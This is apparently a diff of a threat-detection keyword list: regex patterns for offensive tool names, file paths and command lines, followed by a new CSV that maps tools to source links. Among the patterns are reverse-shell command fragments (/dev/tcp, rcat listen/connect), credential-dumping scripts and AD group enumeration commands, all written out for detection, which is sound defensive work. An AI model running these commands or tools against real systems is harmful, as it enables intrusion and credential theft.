sessions.* .*\\net\.exe.* view .*/domain.* .*\\net1 sessions.* +.*\\netexec\.py.* +.*\\netexec\.yml.* .*\\NetExec-main.* +.*\\NetExec-main\\.* .*\\NetLoader\.exe.* .*\\netscan\.exe.* .*\\netscan\.exe.* @@ -6503,6 +6615,7 @@ .*\\NoFilter\.sln.* .*\\NoFilter\.vcxproj.* .*\\nopac\.exe.* +.*\\nopac\.py.* .*\\NoPowerShell.* .*\\NoPowerShell\..* .*\\No-PowerShell\.cs.* @@ -6513,13 +6626,18 @@ .*\\NPPSpy\.txt.* .*\\ntdlll-unhooking-collection.* .*\\ntdlol\.txt.* +.*\\ntdsutil\.py.* .*\\ntlm\.py.* .*\\NTLMRelay2Self.* .*\\ntlmutil\.py.* +.*\\ntlmv1\.py.* .*\\NtoskrnlOffsets\.csv.* .*\\NtRemoteLoad\.sln.* .*\\NtRights\\.* .*\\Nuages_Cli.* +.*\\nxc\.exe.* +.*\\nxc\\parsers\\ip\.py.* +.*\\nxc\\parsers\\nmap\.py.* .*\\obfy-1\.0\.zip.* .*\\OffensiveCSharp\\.* .*\\out_pe\.exe.* @@ -6527,6 +6645,7 @@ .*\\papacat\.ps1.* .*\\papacat\.zip.* .*\\ParsedMalleableData\.txt.* +.*\\parsers\\nessus\.py.* .*\\password\.lst.* .*\\Passwordfiles\.txt.* .*\\PatchingAPI\.cpp.* @@ -6536,6 +6655,7 @@ .*\\PerfExec\.exe.* .*\\Persistence\.cpp.* .*\\Persistence\.exe.* +.*\\petitpotam\.py.* .*\\pipe\\brutepipe.* .*\\PipeViewer\.exe.* .*\\PipeViewer\.sln.* @@ -6567,11 +6687,13 @@ .*\\PPLBlade-main.* .*\\PPLFault.* .*\\PPLKiller.* +.*\\printnightmare\.py.* .*\\PrintSpoofer\.cs.* .*\\PrintSpoofer-1\.0\.zip.* .*\\PrivEditor\\.* .*\\PrivescCheck.* .*\\PrivKit\\.* +.*\\procdump\.py.* .*\\Process Hacker 2\\.* .*\\process_killer\.cpp.* .*\\ProduKey\.exe.* @@ -6598,6 +6720,9 @@ .*\\RasmanPotato.* .*\\ratchatPT\.go.* .*\\ratchatPT\.syso.* +.*\\rcat-v.*-win-x86_64\.exe.* +.*\\rdcman\.py.* +.*\\rdp\.py.* .*\\RDPCredsStealerDLL.* .*\\RealTimeSync\.exe.* .*\\Reaper\\Reaper\.cpp.* @@ -6609,6 +6734,7 @@ .*\\RedPersist\.pdb.* .*\\RedPersist\.sln.* .*\\RedPersist-main\\.* +.*\\reg-query\.py.* .*\\RemoteCamera\.dll.* .*\\Resources\\Disks-NoEncryption\.txt.* .*\\resources\\PROCEXP\.sys.* @@ -6625,6 +6751,7 @@ .*\\run\\john\\.*\.pl.* .*\\run\\john\\.*\.py.* .*\\RunasCs\.cs.* +.*\\runasppl\.py.* .*\\RunBOF\.exe.* .*\\RunOF\.exe.* .*\\RunOF\\bin\\.* @@ -6633,6 +6760,7 @@ .*\\samantha\.txt .*\\save_reg\.hive.* .*\\scanACLsResults\.csv.* +.*\\scan-network\.py.* .*\\scmuacbypass\.cpp.* .*\\scmuacbypass\.exe.* .*\\SCMUACBypass\\.* @@ -6645,6 +6773,7 @@ .*\\ScriptSentry\.psd1.* .*\\ScriptSentry\.psm1.* .*\\ScriptSentry\.txt.* +.*\\scuffy\.py.* .*\\Seatbelt\.txt.* .*\\Seatbelt\\Commands\\.* .*\\ServerC2\.cpp.* @@ -6656,6 +6785,7 @@ .*\\SessionSearcher\.csproj.* .*\\SessionSearcher\.exe.* .*\\shadowcoerce\.py.* +.*\\shadowcoerce\.py.* .*\\ShadowSpray\\.*\.cs.* .*\\Sharefinder\.ps1.* .*\\SharpAzbelt\.csproj.* @@ -6687,6 +6817,7 @@ .*\\SimpleLoader\.cpp.* .*\\SimpleLoader\.exe.* .*\\sitadel\.log.* +.*\\slinky\.py.* .*\\SMB_RPC\\.*\.py .*\\smuggler\.py.* .*\\sniff\.py.* @@ -6695,7 +6826,9 @@ .*\\spellbound-main.* .*\\spellgen\.py .* .*\\spellstager\.py .* +.*\\spider_plus\.py.* .*\\SpoofCmdLine\\TheThing.* +.*\\spooler\.py.* .*\\SprayAD\.cna.* .*\\SprayAD\.exe.* .*\\SQLInfoDumps.* @@ -6713,6 +6846,7 @@ .*\\systemic\.txt .*\\TakeMyRDP.* .*\\TASKSHELL\.EXE.* +.*\\teams_localdb\.py.* .*\\teamserver-win\.zip.* .*\\teamstracker\.py.* .*\\Temp\\.*\\ntds\.dit.* @@ -6747,6 +6881,7 @@ .*\\Tor\\torrc.* .*\\TorBrowser.* .*\\TrustExec\.exe.* +.*\\uac\.py.* .*\\UACME-.*\.zip.* .*\\uberfile\.py.* .*\\unDefender\.exe.* @@ -6766,6 +6901,7 @@ .*\\uTorrent\\.* .*\\utweb\.exe.* .*\\UUID_bypass\.py.* +.*\\veeam_dump\.py.* .*\\wce32\.exe.* .*\\wce64\.exe.* .*\\wce-beta\.zip.* @@ -6774,11 +6910,15 @@ .*\\wdextract\.vcxproj.* .*\\wdextract32\.exe.* .*\\wdextract64\.exe.* +.*\\wdigest\.py.* .*\\WdigestOffsets\.csv.* +.*\\web_delivery\.py.* +.*\\webdav\.py.* .*\\WfpTokenDup\.exe.* .*\\whatlicense-main\\.* .*\\WheresMyImplant.* .*\\while_dll_ms.* +.*\\whoami\.py.* .*\\Windows\\Prefetch\\PSEXEC.* .*\\Windows\\Tasks\\Certipy.* .*\\Windows\\Tasks\\p4yl0ad.* @@ -6789,7 +6929,9 @@ .*\\WindowsShareFinder\.cs.* .*\\Win-PS2EXE.* .*\\WinRing0x64\.sys.* +.*\\winscp_dump\.py.* .*\\WiperPoc\.cpp.* +.*\\wireless\.py.* .*\\wl_log\.txt.* .*\\wl-lic\.exe.* .*\\wl-lic\.pdb.* @@ -6810,6 +6952,7 @@ .*\\XOR_b64_encrypted\\.* .*\\xorencrypt\.py.* .*\\ysoserial\\.* +.*\\zerologon\.py.* .*] Eventviewer Persistence created.* .*] Extension Hijacking Persistence created.* .*] Found non-ASCII service: .* @@ -7322,6 +7465,7 @@ .*Add-Exfiltration\.ps1.* .*Add-KeePassConfigTrigger.* .*AddKeePassTrigger\.ps1.* +.*AddKeePassTrigger\.ps1.* .*Add-MpPreference -ExclusionPath .* .*Add-MpPreference -ExclusionProcess .*\\Windows\\System32\\WindowsPowerShell\\v1\.0\\powershell\.exe.* .*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder.*CN=System' -PrincipalSamAccountName .* -Rights All.* @@ -7605,6 +7749,7 @@ .*arp\.spoof on.* .*arp\.spoof\..* .*arp\.spoof\.targets.* +.*arp_mitm\.py.* .*arp_spoof\..* .*arpspoof -i .* .*ArpSpoofer.* @@ -7825,6 +7970,7 @@ .*B374K.*index\.php.* .*b3rito.*yodo.* .*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94.* +.*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.* .*b4ldr/nse-scripts.* .*b4rtik/RedPeanut.* .*b4rtik/RedPeanut.* @@ -8169,6 +8315,7 @@ .*bkeylogger.* .*bkkgdjpomdnfemhhkalfkogckjdkcjkg.* .*bks2john\.py.* +.*blackarch/tree/master/packages/rustcat.* .*blackarrowsec/mssqlproxy.* .*blackarrowsec/pivotnacci.* .*blackhat-arsenal-tools.* @@ -8768,6 +8915,7 @@ .*ChaitanyaHaritash/kimi.* .*chameleon\.py .* .*changepasswd\.py.* +.*change-windows10-mac-address\.py.* .*charlesnathansmith/whatlicense.* .*charles-proxy.* .*charlotte-main\.zip.* @@ -10193,6 +10341,7 @@ .*EasyHook-Managed/LocalHook\.cs.* .*EasyPersistent\.cna.* .*Ebowla-master\.zip.* +.*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.* .*echo .* \.bash_history.* .*echo .* /home/.*/\.bash_history.* .*echo .* /root/\.bash_history.* @@ -10495,6 +10644,8 @@ .*exec /bin/sh 0&0 2>&0.* .*exec 5<>/dev/tcp/.*/.*.*cat <&5 \| while read line.* do \$line 2>&5 >&5.* done.* .*exec CMD=/bin/sh -f elf -o .*\.elf.* +.*Exec_Command_Silent\.vbs.* +.*Exec_Command_WithOutput\.vbs.* .*exec_payload_msi.* .*exec_shellcode\.rb.* .*ExecCmdImplant.* @@ -11874,7 +12025,9 @@ .*hook-lsassy\.py.* .*hook-lsassy\.py.* .*hook-lsassy\.py.* +.*hook-lsassy\.py.* .*hook-pypsrp\.py.* +.*hook-pypykatz\.py.* .*HOST/EXEGOL-01\..* .*Host: FUZZ\.machine\.org.* .*HostEnum\.ps1.* @@ -12775,7 +12928,9 @@ .*Invoke-noPac\..* .*Invoke-NTLMAuth\.ps1.* .*Invoke-Ntsd\.ps1.* +.*Invoke-Obfuscation -ScriptPath .* .*Invoke-Obfuscation.* +.*Invoke-Obfuscation\.psd1.* .*Invoke-OpenInboxFinder.* .*Invoke-OpenOWAMailboxInBrowser.* .*Invoke-OxidResolver.* @@ -12867,6 +13022,7 @@ .*Invoke-PSImage.* .*Invoke-PSInject.* .*Invoke-PSInject\.ps1.* +.*Invoke-PSInject\.ps1.* .*Invoke-PsUACme.* .*Invoke-PsUACme.* .*Invoke-PsUACme.* @@ -13692,6 +13848,7 @@ .*lan_sw_port_scan\.json.* .*lanjelot.* .*LANs\.py.* +.*lanscan_arp\.py.* .*lansearch\.exe .* .*lansearchpro_portable\.zip.* .*lansearchpro_setup\.exe.* @@ -14146,6 +14303,7 @@ .*manager/mRemoteNG\.py.* .*mandiant/DueDLLigence.* .*mandiant/gocrack.* +.*mandiant/msi-search.* .*mandllinject .* .*manspider .* -d .* -u .* -p .* .*manspider .*/24 -f .* @@ -14549,9 +14707,11 @@ .*Mshikaki-main.* .*mshta/shellcode_inject.* .*MSHTAStager.* +.*msi-search-main\.zip.* .*msLDAPDump\.py.* .*MSOfficeManipulator\.cs.* .*msol_dump.* +.*msol_dump\.ps1.* .*MSOLSpray .* .*MSOLSpray\.git.* .*MSOLSpray\.ps1.* @@ -14742,9 +14902,19 @@ .*nessus-updates.*\.tar\.gz.* .*net domain_controllers.* .*net group .*Domain Admins.* /domain.* +.*net group .*Account Operators.* /domain.* +.*net group .*Backup Operators.* /domain.* .*net group .*domain admins.* /domain.* +.*net group .*Domain Computers.* /domain.* +.*net group .*Domain Controllers.* /domain.* .*net group .*Domain Controllers.*/domain.* .*net group .*Enterprise Admins.* /dom.* +.*net group .*Enterprise Admins.* /domain.* +.*net group .*Exchange Trusted Subsystem.* /domain.* +.*net group .*Microsoft Exchange Servers.* /domain.* +.*net group .*Print Operators.* /domain.* +.*net group .*Schema Admins.* /domain.* +.*net group .*Server Operators.* /domain.* .*net group / domain .*Domain Admins.* .*net group /domain .*Domain Admins.* .*net group administrators /domain.* @@ -14759,6 +14929,16 @@ .*net user john H4x00r123.* .*net view /all /domain.* .*net.* group Administrator.* /add /domain.* +.*net\.exe.* group .*Account Operators.* /domain.* +.*net\.exe.* group .*Backup Operators.* /domain.* +.*net\.exe.* group .*Domain Computers.* /domain.* +.*net\.exe.* group .*Domain Controllers.* /domain.* +.*net\.exe.* group .*Enterprise Admins.* /domain.* +.*net\.exe.* group .*Exchange Trusted Subsystem.* /domain.* +.*net\.exe.* group .*Microsoft Exchange Servers.* /domain.* +.*net\.exe.* group .*Print Operators.* /domain.* +.*net\.exe.* group .*Schema Admins.* /domain.* +.*net\.exe.* group .*Server Operators.* /domain.* .*net\.fuzz .* .*net\.fuzz\..* .*net\.probe on @@ -14781,7 +14961,27 @@ .*net_localgroup_member -Group.* .*net_portscan\.py.* .*net_recon\..* +.*net1 group .*Account Operators.* /domain.* +.*net1 group .*Backup Operators.* /domain.* +.*net1 group .*Domain Computers.* /domain.* +.*net1 group .*Domain Controllers.* /domain.* +.*net1 group .*Enterprise Admins.* /domain.* +.*net1 group .*Exchange Trusted Subsystem.* /domain.* +.*net1 group .*Microsoft Exchange Servers.* /domain.* +.*net1 group .*Print Operators.* /domain.* +.*net1 group .*Schema Admins.* /domain.* +.*net1 group .*Server Operators.* /domain.* .*net1 localgroup admin.* +.*net1\.exe.* group .*Account Operators.* /domain.* +.*net1\.exe.* group .*Backup Operators.* /domain.* +.*net1\.exe.* group .*Domain Computers.* /domain.* +.*net1\.exe.* group .*Domain Controllers.* /domain.* +.*net1\.exe.* group .*Enterprise Admins.* /domain.* +.*net1\.exe.* group .*Exchange Trusted Subsystem.* /domain.* +.*net1\.exe.* group .*Microsoft Exchange Servers.* /domain.* +.*net1\.exe.* group .*Print Operators.* /domain.* +.*net1\.exe.* group .*Schema Admins.* /domain.* +.*net1\.exe.* group .*Server Operators.* /domain.* .*netCat.* .*net-creds.* .*netdiscover -i .* -r .*/24.* @@ -14793,6 +14993,7 @@ .*NetExec ldap .* -M enum_trusts.* .*NetExec winrm .*--.* .*NetExec-main\.zip.* +.*NetExec-main\.zip.* .*Net-GPPPassword\.cs.* .*Net-GPPPassword\.exe.* .*Net-GPPPassword_dotNET.* @@ -14923,6 +15124,8 @@ .*nmap -Pn -v -sS -F.* .*nmap-.*-setup\.exe.* .*nmap/ncrack.* +.*nmap_port_scanner\.py.* +.*nmap_port_scanner_ip_obj\.py.* .*nmap_smb_scan_custom_.*\.txt.* .*nmapAnswerMachine\.py.* .*nmap-elasticsearch-nse.* @@ -15082,6 +15285,8 @@ .*nxc mssql .*--local-auth.* .*nxc ssh .* .*nxc winrm .* -X .* +.*nxc.*nxcdb\.py.* +.*nxcdb-zipapp-.* .*nysm\.skel\.h.* .*nysm-master\.zip.* .*nyxgeek.* @@ -15324,6 +15529,7 @@ .*package=impacket.* .*PackMyPayload\.py.* .*PackMyPayload-master.* +.*pacman -S rustcat.* .*pacu --exec .* .*pacu --list-modules.* .*pacu --module-args=.* @@ -15702,6 +15908,8 @@ .*pornhub\.py.* .*port and pasv both active.* .*port_forward_pivot\.py.* +.*port_scanner_ip_obj\.py.* +.*port_scanner_regex\.py.* .*PortBender backdoor.* .*PortBender redirect.* .*PortBender\.cna.* @@ -16257,6 +16465,7 @@ .*pwn_jenkins.* .*pwn1sher/CS-BOFs.* .*pwn1sher/WMEye.* +.*pwn3d_label = Pwn3d!.* .*pwnagotchi.* .*pwnat\.exe.* .*pwncat-cs .*:.* @@ -16305,6 +16514,7 @@ .*pyherion\.py.* .*pyhon3 poc\.py .* curl http://.*/shell\.sh -o /tmp/shell\.sh.* .*pyinstaller .*\.py.* +.*pyinstaller netexec\.spec.* .*pyinstaller\.exe.* .*pyinstaller/tarball.* .*pyinstaller-script\.py.* @@ -16563,6 +16773,15 @@ .*RBCD_Petitpotam_VulnerableServers\.txt.* .*rbsec/dnscan.* .*rc4\.py .*\.bin.* +.*rcan listen -ib .* +.*rcat c -s bash .* +.*rcat connect -s bash.* +.*rcat listen 55660.* +.*rcat listen -ie .* +.*rcat listen -l .* +.*rcat-v3\..*darwin-aarch64.* +.*rcat-v3\..*-darwin-x86_64.* +.*rcat-v3\..*-linux-x86_64.* .*RCE-exploits.* .*rclone copy .*:.* .*rclone\.exe config create remote mega user .* @@ -16820,6 +17039,7 @@ .*Remove-Item .*C:\\Users\\.*\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.* .*Remove-KeePassConfigTrigger.* .*RemoveKeePassTrigger\.ps1.* +.*RemoveKeePassTrigger\.ps1.* .*remove-persistence.* .*Remove-Persistence\.ps1.* .*remove-persistence-cron.* @@ -16854,6 +17074,7 @@ .*responder-smb-on.* .*Responder-Windows.* .*RestartKeePass\.ps1.* +.*RestartKeePass\.ps1.* .*restic2john\.py.* .*restore_signature\.sh .*\.dmp.* .*RestrictedAdmin\.exe.* @@ -17119,6 +17340,7 @@ .*RuralBishop\.sln.* .*RuralBishop-master.* .*rustbof\.cna.* +.*rustcat-3\.0\.0\.zip.* .*rusthound .* --zip --ldaps --adcs --old-bloodhound.* .*rusthound .*--domain.* .*rusthound .*--ldapfqdn .* @@ -17297,6 +17519,7 @@ .*scshellbof\.o.* .*scshellbofx64.* .*scumjr.*dirtycow-vdso.* +.*Search cached MSI files in C:/Windows/Installer/.* .*search_for_secrets\(.* .*Search-cpassword.* .*SearchOutlook\.exe.* @@ -18674,6 +18897,7 @@ .*targetver\.h.* .*tarunkant/Gopherus.* .*tas389\.ps1.* +.*taskkill /F /T /IM keepass\.exe /FI.* .*tasklist /fi .*Imagename eq lsass\.exe.* \| find .*lsass.* .*tasklist /svc \| findstr /i .*vmtoolsd\.exe.*.* .*TaskShell\.exe .* -b .*\.exe.* @@ -19207,6 +19431,8 @@ .*vectra-ai-research/MAAD-AF.* .*veeam_credential_dump\..* .*veeam_dump.* +.*veeam_dump_mssql\.ps1.* +.*veeam_dump_postgresql\.ps1.* .*Vegile -.* .*venv wapiti3.* .*Verified Merlin server .* @@ -19402,6 +19628,8 @@ .*WhoamiGetTokenInfo.* .*wifi/airpwn.* .*wifi/dnspwn.* +.*wifi_dos_own\.py.* +.*wifi_dos3\.py.* .*wifi_dump_linux.* .*wifi_fake_auth\..* .*WiFi_Hacker\.ino.* @@ -19797,6 +20025,7 @@ .*Yay! No SYSMON here!.* .*YDHCUI/csload\.net.* .*YDHCUI/manjusaka.* +.*yeelight_discover\.py.* .*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.* .*ylAo2kAlUS2kYkala!.* .*Yml0c3kubWl0LmVkdQ==.* @@ -19999,6 +20228,7 @@ pupysh python3 start_campaign\.py raw_keylogger .* rawshark -.* +rcat listen .* RedGuard -.* remotereg .* rev2self.* diff --git a/release_notes/Release_20231005.csv b/release_notes/Release_20231005.csv new file mode 100644 index 000000000..41cddf2b4 --- /dev/null +++ b/release_notes/Release_20231005.csv @@ -0,0 +1,2076 @@ +"metadata_tool","metadata_link" +"$index_allocation","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/" +"_","N/A" +"0d1n","https://github.com/CoolerVoid/0d1n" +"1clickVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"365-Stealer","https://github.com/AlteredSecurity/365-Stealer" +"3snake","https://github.com/blendin/3snake" +"7zip","http://www.joeware.net/freetools/tools/adfind/index.htm" +"AbandonedCOMKeys","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys" +"acheron","https://github.com/f1zm0/acheron" +"ACLight","https://github.com/cyberark/ACLight" +"Aclpwn","https://github.com/fox-it/aclpwn.py" +"acltoolkit","https://github.com/zblurx/acltoolkit" +"ActiveScanPlusPlus","https://github.com/albinowax/ActiveScanPlusPlus" +"AD exploitation cheat sheet","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/" +"AD exploitation cheat sheet","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/" +"AD exploitation cheat sheet","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"AD_Enumeration_Hunt","https://github.com/alperenugurlu/AD_Enumeration_Hunt" +"ADACLScanner","https://github.com/canix1/ADACLScanner" +"adalanche","https://github.com/lkarlslund/Adalanche" +"Adblock Office VPN Proxy Server","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"adconnectdump","https://github.com/fox-it/adconnectdump" +"ADCSKiller","https://github.com/grimlockx/ADCSKiller" +"ADCSPwn","https://github.com/bats3c/ADCSPwn" +"adexplorer","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer" +"ADExplorerSnapshot.py","https://github.com/c3c/ADExplorerSnapshot.py" +"adfind","https://www.joeware.net/freetools/tools/adfind/usage.htm" +"adfind","N/A" +"adfind","http://www.joeware.net/freetools/tools/adfind/index.htm" +"adfind","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/" +"ADFSpoof","https://github.com/mandiant/ADFSpoof" +"adfspray","https://github.com/xFreed0m/ADFSpray" +"adget","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/" +"AdGuard VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"adhunt","https://github.com/karendm/ADHunt" +"adidnsdump","https://github.com/dirkjanm/adidnsdump" +"ad-ldap-enum","https://github.com/CroweCybersecurity/ad-ldap-enum" +"Admin2Sys","https://github.com/S12cybersecurity/Admin2Sys" +"adrecon","https://github.com/adrecon/ADRecon" +"adsearch","https://github.com/tomcarver16/ADSearch" +"advanced port scanner","https://www.advanced-port-scanner.com/" +"advanced-ip-scanner","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox" +"Advanced-SQL-Injection-Cheatsheet","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet" +"afrog","https://github.com/zan8in/afrog" +"AggressorScripts-1","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence" +"AggressorScripts-1","https://github.com/Cn33liz/AggressorScripts-1" +"AhMyth-Android-RAT","https://github.com/AhMyth/AhMyth-Android-RAT" +"Airbash","https://github.com/tehw0lf/airbash" +"aircrack-ng","https://github.com/aircrack-ng/aircrack-ng" +"Airgeddon","https://github.com/v1s1t0r1sh3r3/airgeddon" +"airmon-ng","https://www.aircrack-ng.org/doku.php?id=airmon-ng" +"airpwn-ng","https://github.com/ICSec/airpwn-ng" +"AlanFramework","https://github.com/enkomio/AlanFramework" +"Alcatraz","https://github.com/weak1337/Alcatraz" +"al-khaser","https://github.com/LordNoteworthy/al-khaser" +"Amass","https://github.com/OWASP/Amass" +"amass","https://github.com/caffix/amass" +"amsi.fail","https://amsi.fail/" +"Amsi_Bypass","https://github.com/senzee1984/Amsi_Bypass_In_2023" +"AMSI_patch","https://github.com/TheD1rkMtr/AMSI_patch" +"Amsi-Killer","https://github.com/ZeroMemoryEx/Amsi-Killer" +"AndrewSpecial","https://github.com/hoangprod/AndrewSpecial" +"Anevicon","https://github.com/rozgo/anevicon" +"anonfiles.com","https://twitter.com/mthcht/status/1660953897622544384" +"Anonymous Proxy Vpn Browser","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Antivirus Signature","N/A" +"Antivirus Signature","lsass dump malware signature" +"Antivirus Signature","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt" +"anydesk","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection" +"anydesk","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"anymailfinder","https://anymailfinder.com" +"AoratosWin","https://github.com/PinoyWH1Z/AoratosWin" +"APCLdr","https://github.com/NUL0x4C/APCLdr" +"apkfold free vpn","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"apollon","https://github.com/codewhitesec/apollon" +"APT","N/A" +"APTSimulator","https://github.com/NextronSystems/APTSimulator" +"aquatone","https://github.com/michenriksen/aquatone" +"archerysec","https://github.com/archerysec/archerysec" +"archstrike","https://archstrike.org/" +"Ares","https://github.com/sweetsoftware/Ares" +"armitage","https://github.com/r00t0v3rr1d3/armitage" +"arpspoofing","https://github.com/luijait/arpspoofing" +"ASREPRoast","https://github.com/HarmJ0y/ASREPRoast" +"assoc","N/A" +"Astar VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Atera","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/" +"AtlasC2","https://github.com/Gr1mmie/AtlasC2" +"AtlasReaper","https://github.com/werdhaihai/AtlasReaper" +"AtomLdr","https://github.com/NUL0x4C/AtomLdr" +"ATPMiniDump","https://github.com/b4rtik/ATPMiniDump" +"AttackSurfaceMapper","https://github.com/superhedgy/AttackSurfaceMapper" +"attifyos","https://github.com/adi0x90/attifyos" +"attrib","N/A" +"attrib","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md" +"Augustus","https://github.com/TunnelGRE/Augustus" +"autobloody","https://github.com/CravateRouge/autobloody" +"AutoC2","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2" +"autonse","https://github.com/m4ll0k/AutoNSE" +"autopwn","https://github.com/nccgroup/autopwn" +"AutoRDPwn","https://github.com/JoelGMSec/AutoRDPwn" +"AutoSmuggle","https://github.com/surajpkhetani/AutoSmuggle" +"autotimeliner","https://github.com/andreafortuna/autotimeliner" +"avet","https://github.com/govolution/avet" +"avred","https://github.com/dobin/avred" +"Awesome-Hacking","https://github.com/Hack-with-Github/Awesome-Hacking" +"Awesome-Hacking-Resources","https://github.com/vitalysim/Awesome-Hacking-Resources" +"awesome-osint","https://github.com/jivoi/awesome-osint" +"awesome-pentest","https://github.com/enaqx/awesome-pentest" +"awesome-pentest-cheat-sheets","https://github.com/coreb1t/awesome-pentest-cheat-sheets" +"awesome-scapy","https://github.com/secdev/awesome-scapy" +"awesome-static-analysis","https://github.com/codefactor-io/awesome-static-analysis" +"awesome-web-security","https://github.com/qazbnm456/awesome-web-security" +"awesome-windows-domain-hardening","https://github.com/PaulSec/awesome-windows-domain-hardening" +"AWS-Loot","https://github.com/sebastian-mora/AWS-Loot" +"Azino VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Azure-AccessPermissions","https://github.com/csandker/Azure-AccessPermissions" +"AzureAD_Autologon_Brute","https://github.com/nyxgeek/AzureAD_Autologon_Brute" +"AzureADLateralMovement","https://github.com/talmaor/AzureADLateralMovement" +"AzureC2Relay","https://github.com/Flangvik/AzureC2Relay" +"b374k","https://github.com/b374k/b374k" +"BabelStrike","https://github.com/t3l3machus/BabelStrike" +"backdoor keyword","N/A" +"Backstab","https://github.com/Yaxser/Backstab" +"BackupOperatorToDA","https://github.com/mpgn/BackupOperatorToDA" +"badazure","https://github.com/mvelazc0/BadZure/" +"Bad-PDF","https://github.com/deepzec/Bad-Pdf" +"badtouch","https://github.com/kpcyrd/badtouch" +"BaRMIe","https://github.com/NickstaDB/BaRMIe" +"base64","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass" +"bash","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"bash","N/A" +"bash","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"bash","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml" +"bash","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml" +"bash keylogger","N/A" +"bash port scan","N/A" +"Bashfuscator","https://github.com/Bashfuscator/Bashfuscator" +"bashupload.com","https://twitter.com/mthcht/status/1660953897622544384" +"bcdedit","N/A" +"beef","https://github.com/beefproject/beef" +"BeeLogger","https://github.com/4w4k3/BeeLogger" +"BelkaVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"BeRoot","https://github.com/AlessandroZ/BeRoot" +"BesoToken","https://github.com/OmriBaso/BesoToken" +"Best VPN USA","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"BetterBackdoor","https://github.com/thatcherclough/BetterBackdoor" +"bettercap","https://github.com/bettercap/bettercap" +"betterdefaultpasslist","https://github.com/govolution/betterdefaultpasslist" +"binwalk","https://github.com/ReFirmLabs/binwalk" +"bitb","https://github.com/mrd0x/BITB" +"bitsadmin","N/A" +"bittorent","https[://]www[.]bittorrent.com/fr/" +"Biu-framework","https://awesomeopensource.com/project/0xbug/Biu-framework" +"blackcat ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/" +"Blackout","https://github.com/ZeroMemoryEx/Blackout" +"BlockEtw","https://github.com/Soledge/BlockEtw" +"BlockOpenHandle","https://github.com/TheD1rkMtr/BlockOpenHandle" +"BlockWindows","https://github.com/WindowsLies/BlockWindows" +"bloodhound","https://github.com/fox-it/BloodHound.py" +"bloodhound","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" +"BloodHound","https://github.com/BloodHoundAD/BloodHound" +"BloodHound.py","https://github.com/fox-it/BloodHound.py" +"bloodhound-quickwin","https://github.com/kaluche/bloodhound-quickwin" +"bloodyAD","https://github.com/CravateRouge/bloodyAD" +"BOF.NET","https://github.com/CCob/BOF.NET" +"bof-collection","https://github.com/cube0x0/MiniDump" +"bof-collection","https://github.com/crypt0p3g/bof-collection" +"bofhound","https://github.com/fortalice/bofhound" +"BOFMask","https://github.com/passthehashbrowns/BOFMask" +"BOINC","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp" +"boko","https://github.com/bashexplode/boko" +"bootkit-rs","https://github.com/memN0ps/bootkit-rs" +"bropper","https://github.com/Hakumarachi/Bropper" +"Browsec 